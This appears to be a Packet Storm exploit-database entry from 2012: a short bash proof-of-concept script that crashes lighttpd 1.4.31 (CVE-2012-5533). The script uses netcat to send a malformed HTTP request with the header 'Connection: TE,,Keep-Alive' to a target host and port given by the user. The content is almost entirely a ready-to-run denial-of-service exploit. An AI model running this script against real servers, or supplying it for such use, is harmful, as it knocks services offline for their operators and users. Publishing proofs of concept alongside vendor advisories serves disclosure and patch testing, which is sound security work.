Lucene search

K
packetstormMilan BergerPACKETSTORM:118282
HistoryNov 22, 2012 - 12:00 a.m.

Simple Lighttpd 1.4.31 Denial Of Service

2012-11-2200:00:00
Milan Berger
packetstormsecurity.com
94

EPSS

0.663

Percentile

97.9%

`#!/bin/bash  
# simple lighttpd 1.4.31 DOS POC  
# CVE-2012-5533  
# http://www.lighttpd.net/2012/11/21/1-4-32/  
# http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2012_01.txt  
# written by Milan Berger <[email protected]>  
  
if [ $# -lt 2 ]  
then  
echo "usage :$0 <Host/IP> <Port>"  
else  
echo -ne "GET / HTTP/1.1\r\nHost: pwn.ed\r\nConnection:  
TE,,Keep-Alive\r\n\r\n" | nc $1 $2   
fi  
  
`